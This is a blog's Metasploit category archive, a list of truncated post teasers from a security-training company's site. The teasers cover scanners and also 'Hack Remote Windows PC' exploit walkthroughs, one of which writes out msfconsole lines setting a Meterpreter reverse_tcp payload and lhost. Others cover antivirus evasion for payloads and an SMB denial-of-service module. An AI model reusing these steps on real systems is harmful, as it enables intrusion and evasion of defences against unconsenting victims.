Category Archives: Metasploit


ByteCode is a leading company in delivering the IT Training and Certifications. Since its foundation we are committed to offer the best Trainings and Services to our students, clients and partners with a high standard, Because we believe that high standards Read more…


  Bytecode Cyber Security is Now Authorized Training Partner of  DIS Consultant,India   Online and Classroom Trainings Bytecode cyber security is India’s Best institute to learn DIS10( Diploma in information Security). DIS10 is one certification program which has benefits of Read more…


Hack Remote Windows PC using Real player RealMedia File Handling stack based buffer overflow on RealPlayer This module exploits a stack based buffer overflow on RealPlayer set payload windows/meterpreter/reverse_tcp msf exploit (real_player_url_property_bof)>set lhost 192.168.1.3 (IP of Local Host) msf exploit Read more…


Hack Remote Windows PC using ABBS Audio Media Player .LST Buffer Overflow Hack Remote Windows PC using ABBS Audio Media Player .LST Buffer Overflow This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding Read more…


certificate (cert) check with Metasploit The “cert” scanner module is a useful administrative scanner that allows you to cover a subnet to check whether or not server certificates are expired  


Yesterday i created simple script which extract email address from given Domain. We can gather email address from whois info; pgp key search ;domain name. With help of this script we can extract email address which are on the specified Read more…


Backtrack has lots of tools for web-application testing. Directory traversal is one of the critical vulnerability in web-application. Previously i post about what is directory traversal & how to bypass its filter , but that process is manual, it can Read more…


Today this blog complete exactly one year.Before one year i started journey in security world & still now it`s going well.Ok get to the point.Most of time it happened that our payload is detected by AV ;we can use encoder Read more…


Recently Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography.Now exploit is available in metasploit. Use msfupdate to get it. Exploit target: Id Name — —- 0 Read more…


In penetration testing first step is how we can bypass AV & make our payload FUD. Previously we saw that we can bypass AV using Veil.At that time we used python module.In veil there are four types of payload.C,C#,powershell and Read more…


This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the Read more…


NeXpose Via Msfconsole The Metasploit/NeXpose integration is not limited to simply importing scan results files. You can run NeXpose scans directly from msfconsole by first making use of the ‘nexpose’ plugin. msf > load nexpose ▄▄▄ ▄▄ ▄▄▄ ▄▄▄ ███ Read more…


NeXpose Via Msfconsole The Metasploit/NeXpose integration is not limited to simply importing scan results files. You can run NeXpose scans directly from msfconsole by first making use of the ‘nexpose’ plugin. msf > load nexpose ▄▄▄ ▄▄ ▄▄▄ ▄▄▄ ███ Read more…


WMAP Web Scanner WMAP is a feature-rich web vulnerability scanner that was originally created from a tool named SQLMap. This tool is integrated with Metasploit and allows us to conduct webapp scanning from within the Framework. We begin by first Read more…